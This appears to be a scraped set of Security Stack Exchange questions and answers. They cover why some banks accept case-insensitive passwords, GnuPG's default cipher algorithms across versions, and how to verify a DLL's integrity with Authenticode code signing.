"https://security.stackexchange.com/questions/86094",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11825/"
]
} |
86,249 | It was recently brought to my attention that a certain big bank website allows users to log in with passwords that are not case sensitive. After confirming this, I checked other websites I bank with and found a second big bank website that does the same thing. I did not check their mobile clients. To me it seems like this lowers security, as this increases the number of unique passwords that can be used to log in to my account. Is there a common reason and/or justification for this from a security standpoint? The top non-security reason I could come up with is that it reduces calls to the helpdesk related to case sensitive passwords. | The most likely reason is that the backend only supports case-insensitive passwords. To quote OWASP : Occasionally, we find systems where passwords aren't case sensitive,
frequently due to legacy system issues like old mainframes that didn't
have case sensitive passwords. The chances of this happening are much higher with stodgy old institutions like big banks that are still running mainframes in the datacenter. | {
"source": [
"https://security.stackexchange.com/questions/86249",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/19699/"
]
} |
86,305 | I know that one can force GnuPG to use AES256 for encryption with gpg --cipher-algo AES256 or with a special setting in ~/.gnupg/gpg.conf. But what is the default cipher algorithm for GnuPG if I omit this switch? | TL;DR: For GnuPG 1.0 and 2.0 the default is CAST5; for GnuPG 2.1 it is AES-128. Recipient's Preferences By default, GnuPG will read the recipient's algorithm preferences and take the first algorithm in that list it supports (in other words, it takes the most-preferred supported algorithm the recipient asks for). Safe Algorithms If no preferences are given (or --symmetric is used for symmetric encryption using a passphrase), it chooses a "safe" one. Safe means one that must be or should be implemented. Which one this is depends on the version of GnuPG and the compatibility level chosen. You can easily verify this by starting a symmetric encryption, passing one of the compatibility levels (or none, which implies --gnupg): gpg --verbose --symmetric
gpg: using cipher CAST5 Strict RFC Compliance On the other hand, if enforcing strict OpenPGP compliance following RFC 4880, it drops to triple DES: gpg --rfc4880 --verbose --symmetric
gpg: using cipher 3DES The same applies if enforcing RFC 2440 using --rfc2440. GnuPG 2.1 Defaults to AES-128 GnuPG 2.0 also uses CAST5 with the default --gnupg, while this default was changed to AES-128 in GnuPG 2.1: LANG=C gpg2 --verbose --symmetric
gpg: using cipher AES (AES without further specification means AES-128 in GnuPG) GnuPG 2.1 uses the same algorithms for the RFC-compliant settings. Digest Algorithms For digest algorithms, similar algorithm preference inference is performed. If --verbose is set as an option, the used algorithm is printed. An exception is the Modification Detection Code Packet, which only allows SHA-1 with no algorithm choice as defined by the standard. | {
"source": [
"https://security.stackexchange.com/questions/86305",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/72255/"
]
} |
86,492 | I have an old project in VB which created a unique PC code from the MAC address and disk ID. This was used to identify a PC so credentials cannot be reused between PCs. This project migrated to C#, and I encapsulated this logic in a DLL which simply exposes a method that returns the pc_id. The issue I have now is that it's damn easy to just create a new DLL with the same class name and method signature that returns whatever pc_id they wish. How can I ensure the DLL my program is referencing is actually mine? I thought of comparing the hash of my DLL with a hardcoded one, but is this safe across different operating systems? Will the hash of the file change between file systems? Or which method is preferred for ensuring file integrity/origin? | For Windows binaries, I would suggest digitally signing the file. It uses certificates, much the same technology as HTTPS. Introduction to Code Signing SignTool Then you should use the Windows cryptographic APIs to verify the signature of loaded DLLs. I know that getting this done takes a lot of work.
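To make the suggested verification step concrete, here is a minimal C sketch (not part of the original answer; the function name IsSignatureValid and the overall structure are illustrative assumptions) showing how the WinVerifyTrust API can check whether a DLL carries a valid Authenticode signature before you trust it:
#include <windows.h>
#include <wintrust.h>
#include <softpub.h>
#pragma comment(lib, "wintrust")

/* Returns TRUE when the file at filePath has a valid Authenticode signature
   chaining to a trusted root. Assumes the DLL was signed, e.g. with signtool. */
BOOL IsSignatureValid(LPCWSTR filePath)
{
    WINTRUST_FILE_INFO fileInfo = {0};
    fileInfo.cbStruct = sizeof(fileInfo);
    fileInfo.pcwszFilePath = filePath;

    WINTRUST_DATA wd = {0};
    wd.cbStruct = sizeof(wd);
    wd.dwUIChoice = WTD_UI_NONE;              /* never show UI prompts         */
    wd.fdwRevocationChecks = WTD_REVOKE_NONE; /* skip online revocation checks */
    wd.dwUnionChoice = WTD_CHOICE_FILE;
    wd.pFile = &fileInfo;
    wd.dwStateAction = WTD_STATEACTION_VERIFY;

    GUID action = WINTRUST_ACTION_GENERIC_VERIFY_V2;
    LONG status = WinVerifyTrust(NULL, &action, &wd);

    wd.dwStateAction = WTD_STATEACTION_CLOSE; /* release verification state    */
    WinVerifyTrust(NULL, &action, &wd);

    return status == ERROR_SUCCESS;
}
Note that a successful return only proves the file was signed by some publisher Windows trusts; to make sure it is specifically yours, additionally compare the signing certificate (for example its thumbprint) against the one you used with SignTool.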
But, for Windows, this is the safest path. If SHA hashes are not enough, this is the alternative. | {
"source": [
"https://security.stackexchange.com/questions/86492",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/63627/"
]
} |